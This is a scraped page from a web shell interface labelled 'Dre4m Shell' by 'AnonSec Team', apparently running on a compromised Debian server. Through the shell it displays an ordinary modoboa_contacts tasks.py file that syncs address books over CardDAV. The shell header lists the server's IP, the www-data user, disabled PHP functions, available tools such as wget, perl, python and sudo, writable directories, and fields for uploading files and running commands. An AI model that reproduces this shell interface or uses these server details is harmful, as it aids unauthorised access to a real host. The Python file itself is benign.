Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.223.159.143
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/3/task/3/cwd/srv/modoboa/env/lib64/python3.5/site-packages/modoboa_contacts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/3/task/3/cwd/srv/modoboa/env/lib64/python3.5/site-packages/modoboa_contacts/tasks.py
"""Async tasks."""

from django.utils import timezone

from modoboa.lib import cryptutils

from .lib import carddav
from . import models


def get_cdav_client(request, addressbook, write_support=False):
    """Instantiate a new CardDAV client."""
    return carddav.PyCardDAV(
        addressbook.url, user=request.user.username,
        passwd=cryptutils.decrypt(request.session["password"]),
        write_support=write_support
    )


def create_cdav_addressbook(addressbook, password):
    """Create CardDAV address book."""
    clt = carddav.PyCardDAV(
        addressbook.url, user=addressbook.user.username,
        passwd=password,
        write_support=True
    )
    clt.create_abook()


def push_addressbook_to_carddav(request, addressbook):
    """Push every addressbook item to carddav collection.

    Use only once.
    """
    clt = get_cdav_client(request, addressbook, True)
    for contact in addressbook.contact_set.all():
        href, etag = clt.upload_new_card(contact.uid, contact.to_vcard())
        contact.etag = etag
        contact.save(update_fields=["etag"])
    addressbook.last_sync = timezone.now()
    addressbook.sync_token = clt.get_sync_token()
    addressbook.save(update_fields=["last_sync", "sync_token"])


def sync_addressbook_from_cdav(request, addressbook):
    """Fetch changes from CardDAV server."""
    clt = get_cdav_client(request, addressbook)
    changes = clt.sync_vcards(addressbook.sync_token)
    if not len(changes["cards"]):
        return
    for card in changes["cards"]:
        # UID sometimes embded .vcf extension, sometimes not...
        long_uid = card["href"].split("/")[-1]
        short_uid = long_uid.split(".")[0]
        if "200" in card["status"]:
            content = clt.get_vcard(card["href"]).decode()
            contact = models.Contact.objects.filter(
                uid__in=[long_uid, short_uid]).first()
            if not contact:
                contact = models.Contact(addressbook=addressbook)
            if contact.etag != card["etag"]:
                contact.etag = card["etag"]
                contact.update_from_vcard(content)
        elif "404" in card["status"]:
            models.Contact.objects.filter(
                uid__in=[long_uid, short_uid]).delete()
    addressbook.last_sync = timezone.now()
    addressbook.sync_token = changes["token"]
    addressbook.save(update_fields=["last_sync", "sync_token"])


def push_contact_to_cdav(request, contact):
    """Upload new contact to cdav collection."""
    clt = get_cdav_client(request, contact.addressbook, True)
    path, etag = clt.upload_new_card(contact.uid, contact.to_vcard())
    contact.etag = etag
    contact.save(update_fields=["etag"])


def update_contact_cdav(request, contact):
    """Update existing contact."""
    clt = get_cdav_client(request, contact.addressbook, True)
    uid = contact.uid
    if not uid.endswith(".vcf"):
        uid += ".vcf"
    result = clt.update_vcard(contact.to_vcard(), uid, contact.etag)
    contact.etag = result["cards"][0]["etag"]
    contact.save(update_fields=["etag"])


def delete_contact_cdav(request, contact):
    """Delete a contact."""
    clt = get_cdav_client(request, contact.addressbook, True)
    uid = contact.uid
    if not uid.endswith(".vcf"):
        uid += ".vcf"
    clt.delete_vcard(uid, contact.etag)

Anon7 - 2022
AnonSec Team